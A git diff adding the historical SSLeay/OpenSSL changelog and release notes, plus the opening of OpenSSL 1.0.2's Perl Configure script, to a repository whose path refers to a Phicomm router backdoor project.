+    Added a SSL_OP_EPHEMERAL_RSA option which causes all SSLv3 RSA keys to
+    use a temporary RSA key.  This is experimental and needs some more work.
+    Fixed a few Win16 build problems.
+
+23-Jun-97
+    SSLv3 bug. I was not doing the 'lookup' of the CERT structure
+    correctly. I was taking the SSL->ctx->default_cert when I should
+    have been using SSL->cert. The bug was in ssl/s3_srvr.c
+
+20-Jun-97
+    X509_ATTRIBUTES were being encoded wrongly by apps/reg.c and the
+    rest of the library. Even though I had the code required to do
+    it correctly, apps/req.c was doing the wrong thing.  I have fixed
+    and tested everything.
+
+    Missing a few #ifdef FIONBIO sections in crypto/bio/bss_acpt.c.
+
+19-Jun-97
+    Fixed a bug in the SSLv2 server side first packet handling. When
+    using the non-blocking test BIO, the ssl->s2->first_packet flag
+    was being reset when a would-block failure occurred when reading
+    the first 5 bytes of the first packet. This caused the checking
+    logic to run at the wrong time and cause an error.
+
+    Fixed a problem with specifying cipher. If RC4-MD5 were used,
+    only the SSLv3 version would be picked up.  Now this will pick
+    up both SSLv2 and SSLv3 versions. This required changing the
+    SSL_CIPHER->mask values so that they only mask the ciphers,
+    digests, authentication, export type and key-exchange algorithms.
+
+    I found that when a SSLv23 session is established, a reused
+    session, of type SSLv3 was attempting to write the SSLv2 
+    ciphers, which were invalid. The SSL_METHOD->put_cipher_by_char 
+    method has been modified so it will only write out cipher which
+    that method knows about.  
+
+
+ Changes between 0.8.0 and 0.8.1
+
+  *) Mostly bug fixes. 
+     There is an Ephemeral DH cipher problem which is fixed.
+
+ SSLeay 0.8.0
+
+This version of SSLeay has quite a lot of things different from the
+previous version.
+
+Basically check all callback parameters, I will be producing documentation
+about how to use things in th future.  Currently I'm just getting 080 out
+the door.  Please not that there are several ways to do everything, and
+most of the applications in the apps directory are hybrids, some using old
+methods and some using new methods.
+
+Have a look in demos/bio for some very simple programs and
+apps/s_client.c and apps/s_server.c for some more advanced versions.
+Notes are definitly needed but they are a week or so away.
+
+Anyway, some quick nots from Tim Hudson (tjh@cryptsoft.com)
+---
+Quick porting notes for moving from SSLeay-0.6.x to SSLeay-0.8.x to
+get those people that want to move to using the new code base off to
+a quick start.
+
+Note that Eric has tidied up a lot of the areas of the API that were
+less than desirable and renamed quite a few things (as he had to break
+the API in lots of places anyrate). There are a whole pile of additional
+functions for making dealing with (and creating) certificates a lot
+cleaner.
+
+01-Jul-97
+Tim Hudson
+tjh@cryptsoft.com
+
+---8<---
+
+To maintain code that uses both SSLeay-0.6.x and SSLeay-0.8.x you could
+use something like the following (assuming you #include "crypto.h" which
+is something that you really should be doing).
+
+#if SSLEAY_VERSION_NUMBER >= 0x0800
+#define SSLEAY8
+#endif
+
+buffer.h -> splits into buffer.h and bio.h so you need to include bio.h
+            too if you are working with BIO internal stuff (as distinct
+        from simply using the interface in an opaque manner)
+
+#include "bio.h"    - required along with "buffer.h" if you write
+              your own BIO routines as the buffer and bio
+              stuff that was intermixed has been separated
+              out 
+            
+envelope.h -> evp.h  (which should have been done ages ago)
+
+Initialisation ... don't forget these or you end up with code that
+is missing the bits required to do useful things (like ciphers):
+
+SSLeay_add_ssl_algorithms()
+(probably also want SSL_load_error_strings() too but you should have
+ already had that call in place)
+
+SSL_CTX_new()   - requires an extra method parameter
+              SSL_CTX_new(SSLv23_method()) 
+              SSL_CTX_new(SSLv2_method()) 
+              SSL_CTX_new(SSLv3_method()) 
+
+          OR to only have the server or the client code
+              SSL_CTX_new(SSLv23_server_method()) 
+              SSL_CTX_new(SSLv2_server_method()) 
+              SSL_CTX_new(SSLv3_server_method()) 
+          or  
+              SSL_CTX_new(SSLv23_client_method()) 
+              SSL_CTX_new(SSLv2_client_method()) 
+              SSL_CTX_new(SSLv3_client_method()) 
+
+SSL_set_default_verify_paths() ... renamed to the more appropriate
+SSL_CTX_set_default_verify_paths()
+
+If you want to use client certificates then you have to add in a bit
+of extra stuff in that a SSLv3 server sends a list of those CAs that
+it will accept certificates from ... so you have to provide a list to
+SSLeay otherwise certain browsers will not send client certs.
+
+SSL_CTX_set_client_CA_list(ctx,SSL_load_client_CA_file(s_cert_file));
+
+
+X509_NAME_oneline(X)    -> X509_NAME_oneline(X,NULL,0)  
+               or provide a buffer and size to copy the
+               result into
+
+X509_add_cert ->  X509_STORE_add_cert (and you might want to read the
+          notes on X509_NAME structure changes too)
+
+
+VERIFICATION CODE
+=================
+
+The codes have all be renamed from VERIFY_ERR_* to X509_V_ERR_* to
+more accurately reflect things.
+
+The verification callback args are now packaged differently so that
+extra fields for verification can be added easily in future without
+having to break things by adding extra parameters each release :-)
+
+X509_cert_verify_error_string -> X509_verify_cert_error_string
+
+
+BIO INTERNALS
+=============
+
+Eric has fixed things so that extra flags can be introduced in
+the BIO layer in future without having to play with all the BIO
+modules by adding in some macros.
+
+The ugly stuff using 
+    b->flags ~= (BIO_FLAGS_RW|BIO_FLAGS_SHOULD_RETRY)
+becomes
+    BIO_clear_retry_flags(b)
+
+    b->flags |= (BIO_FLAGS_READ|BIO_FLAGS_SHOULD_RETRY)
+becomes
+    BIO_set_retry_read(b)
+
+Also ... BIO_get_retry_flags(b), BIO_set_flags(b)
+
+
+
+OTHER THINGS
+============
+
+X509_NAME has been altered so that it isn't just a STACK ... the STACK
+is now in the "entries" field ... and there are a pile of nice functions
+for getting at the details in a much cleaner manner.
+
+SSL_CTX has been altered ... "cert" is no longer a direct member of this
+structure ... things are now down under "cert_store" (see x509_vfy.h) and
+things are no longer in a CERTIFICATE_CTX but instead in a X509_STORE.
+If your code "knows" about this level of detail then it will need some 
+surgery.
+
+If you depending on the incorrect spelling of a number of the error codes
+then you will have to change your code as these have been fixed.
+
+ENV_CIPHER "type" got renamed to "nid" and as that is what it actually
+has been all along so this makes things clearer.
+ify_cert_error_string(ctx->error));
+
+SSL_R_NO_CIPHER_WE_TRUST -> SSL_R_NO_CIPHER_LIST
+            and SSL_R_REUSE_CIPHER_LIST_NOT_ZERO
+
+
+
+ Changes between 0.7.x and 0.8.0
+  
+  *) There have been lots of changes, mostly the addition of SSLv3.
+     There have been many additions from people and amongst
+     others, C2Net has assisted greatly.
+ 
+ Changes between 0.7.x and 0.7.x
+
+  *) Internal development version only
+
+SSLeay 0.6.6 13-Jan-1997
+
+The main additions are
+
+- assember for x86 DES improvments.
+  From 191,000 per second on a pentium 100, I now get 281,000.  The inner
+  loop and the IP/FP modifications are from
+  Svend Olaf Mikkelsen <svolaf@inet.uni-c.dk>.  Many thanks for his
+  contribution.
+- The 'DES macros' introduced in 0.6.5 now have 3 types.
+  DES_PTR1, DES_PTR2 and 'normal'.  As per before, des_opts reports which
+  is best and there is a summery of mine in crypto/des/options.txt
+- A few bug fixes.
+- Added blowfish.  It is not used by SSL but all the other stuff that
+  deals with ciphers can use it in either ecb, cbc, cfb64 or ofb64 modes.
+  There are 3 options for optimising Blowfish.  BF_PTR, BF_PTR2 and 'normal'.
+  BF_PTR2 is pentium/x86 specific.  The correct option is setup in
+  the 'Configure' script.
+- There is now a 'get client certificate' callback which can be
+  'non-blocking'.  If more details are required, let me know.  It will
+  documented more in SSLv3 when I finish it.
+- Bug fixes from 0.6.5 including the infamous 'ca' bug.  The 'make test'
+  now tests the ca program.
+- Lots of little things modified and tweaked.
+
+ SSLeay 0.6.5
+
+After quite some time (3 months), the new release.  I have been very busy
+for the last few months and so this is mostly bug fixes and improvments.
+
+The main additions are
+
+- assember for x86 DES.  For all those gcc based systems, this is a big
+  improvement.  From 117,000 DES operation a second on a pentium 100,
+  I now get 191,000.  I have also reworked the C version so it
+  now gives 148,000 DESs per second.  
+- As mentioned above, the inner DES macros now have some more variant that
+  sometimes help, sometimes hinder performance.  There are now 3 options
+  DES_PTR (ptr vs array lookup), DES_UNROLL (full vs partial loop unrolling)
+  and DES_RISC (a more register intensive version of the inner macro).
+  The crypto/des/des_opts.c program, when compiled and run, will give
+  an indication of the correct options to use.
+- The BIO stuff has been improved.  Read doc/bio.doc.  There are now
+  modules for encryption and base64 encoding and a BIO_printf() function.
+- The CA program will accept simple one line X509v3 extensions in the
+  ssleay.cnf file.  Have a look at the example.  Currently this just
+  puts the text into the certificate as an OCTET_STRING so currently
+  the more advanced X509v3 data types are not handled but this is enough
+  for the netscape extensions.
+- There is the start of a nicer higher level interface to the X509
+  strucutre.
+- Quite a lot of bug fixes.
+- CRYPTO_malloc_init()  (or CRYPTO_set_mem_functions()) can be used
+  to define the malloc(), free() and realloc() routines to use
+  (look in crypto/crypto.h).  This is mostly needed for Windows NT/95 when
+  using DLLs and mixing CRT libraries.
+
+In general, read the 'VERSION' file for changes and be aware that some of
+the new stuff may not have been tested quite enough yet, so don't just plonk
+in SSLeay 0.6.5 when 0.6.4 used to work and expect nothing to break.
+
+SSLeay 0.6.4 30/08/96 eay
+
+I've just finished some test builds on Windows NT, Windows 3.1, Solaris 2.3,
+Solaris 2.5, Linux, IRIX, HPUX 10 and everthing seems to work :-).
+
+The main changes in this release
+
+- Thread safe.  have a read of doc/threads.doc and play in the mt directory.
+  For anyone using 0.6.3 with threads, I found 2 major errors so consider
+  moving to 0.6.4.  I have a test program that builds under NT and
+  solaris.
+- The get session-id callback has changed.  Have a read of doc/callback.doc.
+- The X509_cert_verify callback (the SSL_verify callback) now
+  has another argument.  Have a read of doc/callback.doc
+- 'ca -preserve', sign without re-ordering the DN.  Not tested much.
+- VMS support.
+- Compile time memory leak detection can now be built into SSLeay.
+  Read doc/memory.doc
+- CONF routines now understand '\', '\n', '\r' etc.  What this means is that
+  the  SPKAC object mentioned in doc/ns-ca.doc can be on multiple lines.
+- 'ssleay ciphers' added, lists the default cipher list for SSLeay.
+- RC2 key setup is now compatable with Netscape.
+- Modifed server side of SSL implementation, big performance difference when
+      using session-id reuse.
+
+0.6.3
+
+Bug fixes and the addition of some nice stuff to the 'ca' program.
+Have a read of doc/ns-ca.doc for how hit has been modified so
+it can be driven from a CGI script.  The CGI script is not provided,
+but that is just being left as an excersize for the reader :-).
+
+0.6.2
+
+This is most bug fixes and functionality improvements.
+
+Additions are
+- More thread debugging patches, the thread stuff is still being
+  tested, but for those keep to play with stuff, have a look in
+  crypto/cryptlib.c.  The application needs to define 1 (or optionaly
+  a second) callback that is used to implement locking.  Compiling
+  with LOCK_DEBUG spits out lots of locking crud :-).
+  This is what I'm currently working on.
+- SSL_CTX_set_default_passwd_cb() can be used to define the callback
+  function used in the SSL*_file() functions used to load keys.  I was
+  always of the opinion that people should call
+  PEM_read_RSAPrivateKey() and pass the callback they want to use, but
+  it appears they just want to use the SSL_*_file() function() :-(.
+- 'enc' now has a -kfile so a key can be read from a file.  This is
+  mostly used so that the passwd does not appear when using 'ps',
+  which appears imposible to stop under solaris.
+- X509v3 certificates now work correctly.  I even have more examples
+  in my tests :-).  There is now a X509_EXTENSION type that is used in
+  X509v3 certificates and CRLv2.
+- Fixed that signature type error :-(
+- Fixed quite a few potential memory leaks and problems when reusing
+  X509, CRL and REQ structures.
+- EVP_set_pw_prompt() now sets the library wide default password
+  prompt.
+- The 'pkcs7' command will now, given the -print_certs flag, output in
+  pem format, all certificates and CRL contained within.  This is more
+  of a pre-emtive thing for the new verisign distribution method.  I
+  should also note, that this also gives and example in code, of how
+  to do this :-), or for that matter, what is involved in going the
+  other way (list of certs and crl -> pkcs7).
+- Added RSA's DESX to the DES library.  It is also available via the
+  EVP_desx_cbc() method and via 'enc desx'. 
+
+SSLeay 0.6.1
+
+The main functional changes since 0.6.0 are as follows
+- Bad news, the Microsoft 060 DLL's are not compatable, but the good news is
+  that from now on, I'll keep the .def numbers the same so they will be.
+- RSA private key operations are about 2 times faster that 0.6.0
+- The SSL_CTX now has more fields so default values can be put against
+  it.  When an SSL structure is created, these default values are used
+  but can be overwritten.  There are defaults for cipher, certificate,
+  private key, verify mode and callback.  This means SSL session
+  creation can now be
+  ssl=SSL_new()
+  SSL_set_fd(ssl,sock);
+  SSL_accept(ssl)
+  ....
+  All the other uglyness with having to keep a global copy of the
+  private key and certificate/verify mode in the server is now gone.
+- ssl/ssltest.c - one process talking SSL to its self for testing.
+- Storage of Session-id's can be controled via a session_cache_mode
+  flag.  There is also now an automatic default flushing of 
+  old session-id's.
+- The X509_cert_verify() function now has another parameter, this
+  should not effect most people but it now means that the reason for
+  the failure to verify is now available via SSL_get_verify_result(ssl).
+  You don't have to use a global variable.
+- SSL_get_app_data() and SSL_set_app_data() can be used to keep some
+  application data against the SSL structure.  It is upto the application
+  to free the data.  I don't use it, but it is available.
+- SSL_CTX_set_cert_verify_callback() can be used to specify a
+  verify callback function that completly replaces my certificate
+  verification code.  Xcert should be able to use this :-).
+  The callback is of the form int app_verify_callback(arg,ssl,cert).
+  This needs to be documented more.
+- I have started playing with shared library builds, have a look in
+  the shlib directory.  It is very simple.  If you need a numbered
+  list of functions, have a look at misc/crypto.num and misc/ssl.num.
+- There is some stuff to do locking to make the library thread safe.
+  I have only started this stuff and have not finished.  If anyone is
+  keen to do so, please send me the patches when finished.
+
+So I have finally made most of the additions to the SSL interface that
+I thought were needed.
+
+There will probably be a pause before I make any non-bug/documentation
+related changes to SSLeay since I'm feeling like a bit of a break.
+
+eric - 12 Jul 1996
+I saw recently a comment by some-one that we now seem to be entering
+the age of perpetual Beta software.
+Pioneered by packages like linux but refined to an art form by
+netscape.
+
+I too wish to join this trend with the anouncement of SSLeay 0.6.0 :-).
+
+There are quite a large number of sections that are 'works in
+progress' in this package.  I will also list the major changes and
+what files you should read.
+
+BIO - this is the new IO structure being used everywhere in SSLeay.  I
+started out developing this because of microsoft, I wanted a mechanism
+to callback to the application for all IO, so Windows 3.1 DLL
+perversion could be hidden from me and the 15 different ways to write
+to a file under NT would also not be dictated by me at library build
+time.  What the 'package' is is an API for a data structure containing
+functions.  IO interfaces can be written to conform to the
+specification.  This in not intended to hide the underlying data type
+from the application, but to hide it from SSLeay :-).
+I have only really finished testing the FILE * and socket/fd modules.
+There are also 'filter' BIO's.  Currently I have only implemented
+message digests, and it is in use in the dgst application.  This
+functionality will allow base64/encrypto/buffering modules to be
+'push' into a BIO without it affecting the semantics.  I'm also
+working on an SSL BIO which will hide the SSL_accept()/SLL_connet()
+from an event loop which uses the interface.
+It is also possible to 'attach' callbacks to a BIO so they get called
+before and after each operation, alowing extensive debug output
+to be generated (try running dgst with -d).
+
+Unfortunaly in the conversion from 0.5.x to 0.6.0, quite a few
+functions that used to take FILE *, now take BIO *.
+The wrappers are easy to write
+
+function_fp(fp,x)
+FILE *fp;
+    {
+    BIO *b;
+    int ret;
+
+    if ((b=BIO_new(BIO_s_file())) == NULL) error.....
+    BIO_set_fp(b,fp,BIO_NOCLOSE);
+    ret=function_bio(b,x);
+    BIO_free(b);
+    return(ret);
+    }
+Remember, there are no functions that take FILE * in SSLeay when
+compiled for Windows 3.1 DLL's.
+
+--
+I have added a general EVP_PKEY type that can hold a public/private
+key.  This is now what is used by the EVP_ functions and is passed
+around internally.  I still have not done the PKCS#8 stuff, but
+X509_PKEY is defined and waiting :-)
+
+--
+For a full function name listings, have a look at ms/crypt32.def and
+ms/ssl32.def.  These are auto-generated but are complete.
+Things like ASN1_INTEGER_get() have been added and are in here if you
+look.  I have renamed a few things, again, have a look through the
+function list and you will probably find what you are after.  I intend
+to at least put a one line descrition for each one.....
+
+--
+Microsoft - thats what this release is about, read the MICROSOFT file.
+
+--
+Multi-threading support.  I have started hunting through the code and
+flaging where things need to be done.  In a state of work but high on
+the list.
+
+--
+For random numbers, edit e_os.h and set DEVRANDOM (it's near the top)
+be be you random data device, otherwise 'RFILE' in e_os.h
+will be used, in your home directory.  It will be updated
+periodically.  The environment variable RANDFILE will override this
+choice and read/write to that file instead.  DEVRANDOM is used in
+conjunction to the RFILE/RANDFILE.  If you wish to 'seed' the random
+number generator, pick on one of these files.
+
+--
+
+The list of things to read and do
+
+dgst -d
+s_client -state (this uses a callback placed in the SSL state loop and
+        will be used else-where to help debug/monitor what
+        is happening.)
+
+doc/why.doc
+doc/bio.doc <- hmmm, needs lots of work.
+doc/bss_file.doc <- one that is working :-)
+doc/session.doc <- it has changed
+doc/speed.doc
+ also play with ssleay version -a.  I have now added a SSLeay()
+ function that returns a version number, eg 0600 for this release
+ which is primarily to be used to check DLL version against the
+ application.
+util/*  Quite a few will not interest people, but some may, like
+ mk1mf.pl, mkdef.pl,
+util/do_ms.sh
+
+try
+cc -Iinclude -Icrypto -c crypto/crypto.c
+cc -Iinclude -Issl -c ssl/ssl.c
+You have just built the SSLeay libraries as 2 object files :-)
+
+Have a general rummage around in the bin stall directory and look at
+what is in there, like CA.sh and c_rehash
+
+There are lots more things but it is 12:30am on a Friday night and I'm
+heading home :-).
+
+eric 22-Jun-1996
+This version has quite a few major bug fixes and improvements.  It DOES NOT
+do SSLv3 yet.
+
+The main things changed
+- A Few days ago I added the s_mult application to ssleay which is
+  a demo of an SSL server running in an event loop type thing.
+  It supports non-blocking IO, I have finally gotten it right, SSL_accept()
+  can operate in non-blocking IO mode, look at the code to see how :-).
+  Have a read of doc/s_mult as well.  This program leaks memory and
+  file descriptors everywhere but I have not cleaned it up yet.
+  This is a demo of how to do non-blocking IO.
+- The SSL session management has been 'worked over' and there is now
+  quite an expansive set of functions to manipulate them.  Have a read of
+  doc/session.doc for some-things I quickly whipped up about how it now works.
+  This assume you know the SSLv2 protocol :-)
+- I can now read/write the netscape certificate format, use the
+  -inform/-outform  'net' options to the x509 command.  I have not put support
+  for this type in the other demo programs, but it would be easy to add.
+- asn1parse and 'enc' have been modified so that when reading base64
+  encoded files (pem format), they do not require '-----BEGIN' header lines.
+  The 'enc' program had a buffering bug fixed, it can be used as a general
+  base64 -> binary -> base64 filter by doing 'enc -a -e' and 'enc -a -d'
+  respecivly.  Leaving out the '-a' flag in this case makes the 'enc' command
+  into a form of 'cat'.
+- The 'x509' and 'req' programs have been fixed and modified a little so
+  that they generate self-signed certificates correctly.  The test
+  script actually generates a 'CA' certificate and then 'signs' a
+  'user' certificate.  Have a look at this shell script (test/sstest)
+  to see how things work, it tests most possible combinations of what can
+  be done.
+- The 'SSL_set_pref_cipher()' function has been 'fixed' and the prefered name
+  of SSL_set_cipher_list() is now the correct API (stops confusion :-).
+  If this function is used in the client, only the specified ciphers can
+  be used, with preference given to the order the ciphers were listed.
+  For the server, if this is used, only the specified ciphers will be used
+  to accept connections.  If this 'option' is not used, a default set of
+  ciphers will be used.  The SSL_CTX_set_cipher_list(SSL_CTX *ctx) sets this
+  list for all ciphers started against the SSL_CTX.  So the order is
+  SSL cipher_list, if not present, SSL_CTX cipher list, if not
+  present, then the library default.
+  What this means is that normally ciphers like
+  NULL-MD5 will never be used.  The only way this cipher can be used
+  for both ends to specify to use it.
+  To enable or disable ciphers in the library at build time, modify the
+  first field for the cipher in the ssl_ciphers array in ssl/ssl_lib.c.
+  This file also contains the 'pref_cipher' list which is the default
+  cipher preference order.
+- I'm not currently sure if the 'rsa -inform net' and the 'rsa -outform net'
+  options work.  They should, and they enable loading and writing the
+  netscape rsa private key format.  I will be re-working this section of
+  SSLeay for the next version.  What is currently in place is a quick and
+  dirty hack.
+- I've re-written parts of the bignum library.  This gives speedups
+  for all platforms.  I now provide assembler for use under Windows NT.
+  I have not tested the Windows 3.1 assembler but it is quite simple code.
+  This gives RSAprivate_key operation encryption times of 0.047s (512bit key)
+  and 0.230s (1024bit key) on a pentium 100 which I consider reasonable.
+  Basically the times available under linux/solaris x86 can be achieve under
+  Windows NT.  I still don't know how these times compare to RSA's BSAFE
+  library but I have been emailing with people and with their help, I should
+  be able to get my library's quite a bit faster still (more algorithm changes).
+  The object file crypto/bn/asm/x86-32.obj should be used when linking
+  under NT.
+- 'make makefile.one' in the top directory will generate a single makefile
+  called 'makefile.one'  This makefile contains no perl references and
+  will build the SSLeay library into the 'tmp' and 'out' directories.
+  util/mk1mf.pl >makefile.one is how this makefile is
+  generated.  The mk1mf.pl command take several option to generate the
+  makefile for use with cc, gcc, Visual C++ and Borland C++.  This is
+  still under development.  I have only build .lib's for NT and MSDOS
+  I will be working on this more.  I still need to play with the
+  correct compiler setups for these compilers and add some more stuff but
+  basically if you just want to compile the library
+  on a 'non-unix' platform, this is a very very good file to start with :-).
+  Have a look in the 'microsoft' directory for my current makefiles.
+  I have not yet modified things to link with sockets under Windows NT.
+  You guys should be able to do this since this is actually outside of the
+  SSLeay scope :-).  I will be doing it for myself soon.
+  util/mk1mf.pl takes quite a few options including no-rc, rsaref  and no-sock
+  to build without RC2/RC4, to require RSAref for linking, and to
+  build with no socket code.
+
+- Oh yes, the cipher that was reported to be compatible with RSA's RC2 cipher
+  that was posted to sci.crypt has been added to the library and SSL.
+  I take the view that if RC2 is going to be included in a standard,
+  I'll include the cipher to make my package complete.
+  There are NO_RC2, NO_RC4 and NO_IDEA macros to remove these ciphers
+  at compile time.  I have not tested this recently but it should all work
+  and if you are in the USA and don't want RSA threatening to sue you,
+  you could probably remove the RC4/RC2 code inside these sections.
+  I may in the future include a perl script that does this code
+  removal automatically for those in the USA :-).
+- I have removed all references to sed in the makefiles.  So basically,
+  the development environment requires perl and sh.  The build environment
+  does not (use the makefile.one makefile).
+  The Configure script still requires perl, this will probably stay that way
+  since I have perl for Windows NT :-).
+
+eric (03-May-1996)
+
+PS Have a look in the VERSION file for more details on the changes and
+   bug fixes.
+I have fixed a few bugs, added alpha and x86 assembler and generally cleaned
+things up.  This version will be quite stable, mostly because I'm on
+holidays until 10-March-1996.  For any problems in the interum, send email
+to Tim Hudson <tjh@mincom.oz.au>.
+
+SSLeay 0.5.0
+
+12-12-95
+This is going out before it should really be released.
+
+I leave for 11 weeks holidays on the 22-12-95 and so I either sit on
+this for 11 weeks or get things out.  It is still going to change a
+lot in the next week so if you do grab this version, please test and
+give me feed back ASAP, inculuding questions on how to do things with
+the library.  This will prompt me to write documentation so I don't
+have to answer the same question again :-).
+
+This 'pre' release version is for people who are interested in the
+library.  The applications will have to be changed to use
+the new version of the SSL interface.  I intend to finish more
+documentation before I leave but until then, look at the programs in
+the apps directory.  As far as code goes, it is much much nicer than
+the old version.
+
+The current library works, has no memory leaks (as far as I can tell)
+and is far more bug free that 0.4.5d.  There are no global variable of
+consequence (I believe) and I will produce some documentation that
+tell where to look for those people that do want to do multi-threaded
+stuff.
+
+There should be more documentation.  Have a look in the
+doc directory.  I'll be adding more before I leave, it is a start
+by mostly documents the crypto library.  Tim Hudson will update
+the web page ASAP.  The spelling and grammar are crap but
+it is better than nothing :-)
+
+Reasons to start playing with version 0.5.0
+- All the programs in the apps directory build into one ssleay binary.
+- There is a new version of the 'req' program that generates certificate
+  requests, there is even documentation for this one :-)
+- There is a demo certification authorithy program.  Currently it will
+  look at the simple database and update it.  It will generate CRL from
+  the data base.  You need to edit the database by hand to revoke a
+  certificate, it is my aim to use perl5/Tk but I don't have time to do
+  this right now.  It will generate the certificates but the management
+  scripts still need to be written.  This is not a hard task.
+- Things have been cleaned up alot.
+- Have a look at the enc and dgst programs in the apps directory.
+- It supports v3 of x509 certiticates.
+
+
+Major things missing.
+- I have been working on (and thinging about) the distributed x509
+  hierachy problem.  I have not had time to put my solution in place.
+  It will have to wait until I come back.
+- I have not put in CRL checking in the certificate verification but
+  it would not be hard to do.  I was waiting until I could generate my
+  own CRL (which has only been in the last week) and I don't have time
+  to put it in correctly.
+- Montgomery multiplication need to be implemented.  I know the
+  algorithm, just ran out of time.
+- PKCS#7.  I can load and write the DER version.  I need to re-work
+  things to support BER (if that means nothing, read the ASN1 spec :-).
+- Testing of the higher level digital envelope routines.  I have not
+  played with the *_seal() and *_open() type functions.  They are
+  written but need testing.  The *_sign() and *_verify() functions are
+  rock solid. 
+- PEM.  Doing this and PKCS#7 have been dependant on the distributed
+  x509 heirachy problem.  I started implementing my ideas, got
+  distracted writing a CA program and then ran out of time.  I provide
+  the functionality of RSAref at least.
+- Re work the asm. code for the x86.  I've changed by low level bignum
+  interface again, so I really need to tweak the x86 stuff.  gcc is
+  good enough for the other boxes.
+
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/Configure b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/Configure
new file mode 100755
index 0000000..5b1ad17
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/Configure
@@ -0,0 +1,2248 @@
+:
+eval 'exec perl -S $0 ${1+"$@"}'
+    if $running_under_some_shell;
+##
+##  Configure -- OpenSSL source tree configuration script
+##
+
+require 5.000;
+use strict;
+
+# see INSTALL for instructions.
+
+my $usage="Usage: Configure [no-<cipher> ...] [enable-<cipher> ...] [experimental-<cipher> ...] [-Dxxx] [-lxxx] [-Lxxx] [-fxxx] [-Kxxx] [no-hw-xxx|no-hw] [[no-]threads] [[no-]shared] [[no-]zlib|zlib-dynamic] [no-asm] [no-dso] [no-krb5] [sctp] [386] [--prefix=DIR] [--openssldir=OPENSSLDIR] [--with-xxx[=vvv]] [--test-sanity] os/compiler[:flags]\n";
+
+# Options:
+#
+# --openssldir  install OpenSSL in OPENSSLDIR (Default: DIR/ssl if the
+#               --prefix option is given; /usr/local/ssl otherwise)
+# --prefix      prefix for the OpenSSL include, lib and bin directories
+#               (Default: the OPENSSLDIR directory)
+#
+# --install_prefix  Additional prefix for package builders (empty by
+#               default).  This needn't be set in advance, you can
+#               just as well use "make INSTALL_PREFIX=/whatever install".
+#
+# --with-krb5-dir  Declare where Kerberos 5 lives.  The libraries are expected
+#		to live in the subdirectory lib/ and the header files in
+#		include/.  A value is required.
+# --with-krb5-lib  Declare where the Kerberos 5 libraries live.  A value is
+#		required.
+#		(Default: KRB5_DIR/lib)
+# --with-krb5-include  Declare where the Kerberos 5 header files live.  A
+#		value is required.
+#		(Default: KRB5_DIR/include)
+# --with-krb5-flavor  Declare what flavor of Kerberos 5 is used.  Currently
+#		supported values are "MIT" and "Heimdal".  A value is required.
+#
+# --test-sanity Make a number of sanity checks on the data in this file.
+#               This is a debugging tool for OpenSSL developers.
+#
+# --cross-compile-prefix Add specified prefix to binutils components.
+#
+# no-hw-xxx     do not compile support for specific crypto hardware.
+#               Generic OpenSSL-style methods relating to this support
+#               are always compiled but return NULL if the hardware
+#               support isn't compiled.
+# no-hw         do not compile support for any crypto hardware.
+# [no-]threads  [don't] try to create a library that is suitable for
+#               multithreaded applications (default is "threads" if we
+#               know how to do it)
+# [no-]shared	[don't] try to create shared libraries when supported.
+# no-asm        do not use assembler
+# no-dso        do not compile in any native shared-library methods. This
+#               will ensure that all methods just return NULL.
+# no-krb5       do not compile in any KRB5 library or code.
+# [no-]zlib     [don't] compile support for zlib compression.
+# zlib-dynamic	Like "zlib", but the zlib library is expected to be a shared
+#		library and will be loaded in run-time by the OpenSSL library.
+# sctp          include SCTP support
+# 386           generate 80386 code
+# no-sse2	disables IA-32 SSE2 code, above option implies no-sse2
+# no-<cipher>   build without specified algorithm (rsa, idea, rc5, ...)
+# -<xxx> +<xxx> compiler options are passed through 
+#
+# DEBUG_SAFESTACK use type-safe stacks to enforce type-safety on stack items
+#		provided to stack calls. Generates unique stack functions for
+#		each possible stack type.
+# DES_PTR	use pointer lookup vs arrays in the DES in crypto/des/des_locl.h
+# DES_RISC1	use different DES_ENCRYPT macro that helps reduce register
+#		dependancies but needs to more registers, good for RISC CPU's
+# DES_RISC2	A different RISC variant.
+# DES_UNROLL	unroll the inner DES loop, sometimes helps, somtimes hinders.
+# DES_INT	use 'int' instead of 'long' for DES_LONG in crypto/des/des.h
+#		This is used on the DEC Alpha where long is 8 bytes
+#		and int is 4
+# BN_LLONG	use the type 'long long' in crypto/bn/bn.h
+# MD2_CHAR	use 'char' instead of 'int' for MD2_INT in crypto/md2/md2.h
+# MD2_LONG	use 'long' instead of 'int' for MD2_INT in crypto/md2/md2.h
+# IDEA_SHORT	use 'short' instead of 'int' for IDEA_INT in crypto/idea/idea.h
+# IDEA_LONG	use 'long' instead of 'int' for IDEA_INT in crypto/idea/idea.h
+# RC2_SHORT	use 'short' instead of 'int' for RC2_INT in crypto/rc2/rc2.h
+# RC2_LONG	use 'long' instead of 'int' for RC2_INT in crypto/rc2/rc2.h
+# RC4_CHAR	use 'char' instead of 'int' for RC4_INT in crypto/rc4/rc4.h
+# RC4_LONG	use 'long' instead of 'int' for RC4_INT in crypto/rc4/rc4.h
+# RC4_INDEX	define RC4_INDEX in crypto/rc4/rc4_locl.h.  This turns on
+#		array lookups instead of pointer use.
+# RC4_CHUNK	enables code that handles data aligned at long (natural CPU
+#		word) boundary.
+# RC4_CHUNK_LL	enables code that handles data aligned at long long boundary
+#		(intended for 64-bit CPUs running 32-bit OS).
+# BF_PTR	use 'pointer arithmatic' for Blowfish (unsafe on Alpha).
+# BF_PTR2	intel specific version (generic version is more efficient).
+#
+# Following are set automatically by this script
+#
+# MD5_ASM	use some extra md5 assember,
+# SHA1_ASM	use some extra sha1 assember, must define L_ENDIAN for x86
+# RMD160_ASM	use some extra ripemd160 assember,
+# SHA256_ASM	sha256_block is implemented in assembler
+# SHA512_ASM	sha512_block is implemented in assembler
+# AES_ASM	ASE_[en|de]crypt is implemented in assembler
+
+# Minimum warning options... any contributions to OpenSSL should at least get
+# past these. 
+
+my $gcc_devteam_warn = "-Wall -pedantic -DPEDANTIC -Wno-long-long -Wsign-compare -Wmissing-prototypes -Wshadow -Wformat -Werror -DCRYPTO_MDEBUG_ALL -DCRYPTO_MDEBUG_ABORT -DREF_CHECK -DOPENSSL_NO_DEPRECATED";
+
